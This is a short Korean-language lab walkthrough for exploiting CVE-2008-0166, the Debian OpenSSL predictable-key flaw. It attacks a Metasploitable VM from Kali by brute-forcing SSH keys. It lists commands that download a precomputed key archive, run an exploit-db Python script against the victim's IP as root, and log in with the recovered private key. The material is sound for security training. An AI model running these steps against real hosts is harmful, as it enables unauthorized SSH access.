Debian OpenSSL Predictable PRNG Brute Force SSH

*Debian OpenSSL Predictable PRNG Brute Force SSH
 Attacker : Kali
 Victim    : Metasploitable

 cve-2008-0166
 Dabian 기반의 OS에 OpenSSL 0.9.8c-1 ~ 0.9.8g-9 버전까지 가능하며 예측가능한 숫자들을 가지고 Brute Force 하는 것

*실습
 (kali)
 #mkdir -p /root/bin && cd /root/bin
 #wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 
 #tar jxvf 5622.tar.bz2 (Public와 상응하는 Private을 만들어냄)

 exploit-db사이트에서 cve-2008-0166을 검색하면 공격하는 코드가 나오게 된다.
 https://www.exploit-db.com/exploits/5720/에서 python 스크립트를 복사

 #vi exploit.py (복사하여 붙여넣기한다.)
 #python exploit.py /root/bin/rsa/2048 192.168.30.134 root 22 10 (root사용자로 ssh, 10스레드로 설정)

 ※상대방의 public 키값에 상응하는 private키를 알아내어짐

키를 찾은거 확인

 #ssh -i 찾아낸키값 192.168.30.134 (해당 Private Key로 암호없이 로그인이 되어진다.)